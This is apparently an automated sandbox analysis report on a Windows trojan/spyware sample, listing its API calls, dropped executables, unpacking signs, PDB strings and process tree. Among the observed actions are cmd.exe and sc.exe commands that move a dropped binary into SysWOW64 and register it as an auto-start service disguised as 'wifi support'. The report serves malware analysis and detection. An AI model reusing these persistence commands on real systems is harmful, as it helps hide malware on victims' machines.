                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_0577F5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_0577F6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: E5C8.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1FD7.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: F805.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 6CF.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 1547.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 3A08.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 6CF.exe.10.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 6CF.exe.10.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 6CF.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 6CF.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 1547.exe.10.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 1547.exe.10.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 1547.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 1547.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 27D7.exe.10.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: 3A08.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 3A08.exe.10.drStatic PE information: Section: ZLIB complexity 1.00054824561
                          Source: 3A08.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 3A08.exe.10.drStatic PE information: Section: .rsrc ZLIB complexity 0.999726313694
                          Source: eIxMVDoQF3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@44/29@81/12
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: eIxMVDoQF3.exeVirustotal: Detection: 38%
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\eIxMVDoQF3.exe "C:\Users\user\Desktop\eIxMVDoQF3.exe"
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeProcess created: C:\Users\user\Desktop\eIxMVDoQF3.exe "C:\Users\user\Desktop\eIxMVDoQF3.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\rwjfsvd C:\Users\user\AppData\Roaming\rwjfsvd
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdProcess created: C:\Users\user\AppData\Roaming\rwjfsvd C:\Users\user\AppData\Roaming\rwjfsvd
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F805.exe C:\Users\user\AppData\Local\Temp\F805.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B50.exe C:\Users\user\AppData\Local\Temp\B50.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\743F.exe C:\Users\user\AppData\Local\Temp\743F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7D0A.exe C:\Users\user\AppData\Local\Temp\7D0A.exe
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\icpymrdv\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess created: C:\Users\user\AppData\Local\Temp\7D0A.exe C:\Users\user\AppData\Local\Temp\7D0A.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" description icpymrdv "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeProcess created: C:\Users\user\Desktop\eIxMVDoQF3.exe "C:\Users\user\Desktop\eIxMVDoQF3.exe"
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F805.exe C:\Users\user\AppData\Local\Temp\F805.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B50.exe C:\Users\user\AppData\Local\Temp\B50.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\743F.exe C:\Users\user\AppData\Local\Temp\743F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7D0A.exe C:\Users\user\AppData\Local\Temp\7D0A.exe
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdProcess created: C:\Users\user\AppData\Roaming\rwjfsvd C:\Users\user\AppData\Roaming\rwjfsvd
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 520
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess created: C:\Users\user\AppData\Local\Temp\7D0A.exe C:\Users\user\AppData\Local\Temp\7D0A.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F805.tmpJump to behavior
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419D12 SetLastError,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4844:64:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6800
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCommand line argument: cbH
                          Source: 7D0A.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 7D0A.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.2.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.2.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 25.0.7D0A.exe.d70000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: eIxMVDoQF3.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: eIxMVDoQF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: F805.exe, 00000010.00000002.415183995.0000000000413000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.371111845.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000016.00000002.414101701.00000000053D0000.00000002.00020000.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.385582652.0000000004FC9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: dC:\fuyazosav96\tohoxubuy-parovu\hutecu\gif-rewasugirupo.pdbh source: B50.exe, 00000017.00000000.384081537.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: FC:\nezo37 pagap_pejusexi bopabizaseg\wumogu30\gonoxiwi.pdbh source: 743F.exe, 00000018.00000000.389463395.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdby source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\nezo37 pagap_pejusexi bopabizaseg\wumogu30\gonoxiwi.pdb source: 743F.exe, 00000018.00000000.389463395.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\vapep44\dasijubud\xerateyot\fobo.pdb source: eIxMVDoQF3.exe, eIxMVDoQF3.exe, 00000000.00000000.272266280.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000000.00000002.276994985.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000001.00000000.275168488.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000002.368688662.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000000.362684220.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000F.00000000.365468817.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: shell32.pdb= source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: C:\fuyazosav96\tohoxubuy-parovu\hutecu\gif-rewasugirupo.pdb source: B50.exe, 00000017.00000000.384081537.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: F805.exe, 00000010.00000002.415183995.0000000000413000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.371111845.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000016.00000002.414101701.00000000053D0000.00000002.00020000.sdmp
                          Source: Binary string: VC:\vapep44\dasijubud\xerateyot\fobo.pdbh source: eIxMVDoQF3.exe, 00000000.00000000.272266280.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000000.00000002.276994985.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000001.00000000.275168488.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000002.368688662.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000000.362684220.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000F.00000000.365468817.0000000000401000.00000020.00020000.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeUnpacked PE file: 23.2.B50.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeUnpacked PE file: 24.2.743F.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeUnpacked PE file: 23.2.B50.exe.400000.0.unpack .text:ER;.data:W;.dubom:W;.xak:W;.zawaxig:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeUnpacked PE file: 24.2.743F.exe.400000.0.unpack .text:ER;.data:W;.lemel:W;.lobil:W;.cixu:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: 25.2.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 25.0.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 25.0.7D0A.exe.d70000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 25.0.7D0A.exe.d70000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 37.0.7D0A.exe.650000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 37.0.7D0A.exe.650000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 37.0.7D0A.exe.650000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 37.0.7D0A.exe.650000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 37.0.7D0A.exe.650000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_00573634 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_007B946C push esi; ret
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_007B94D1 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402E94 push es; iretd
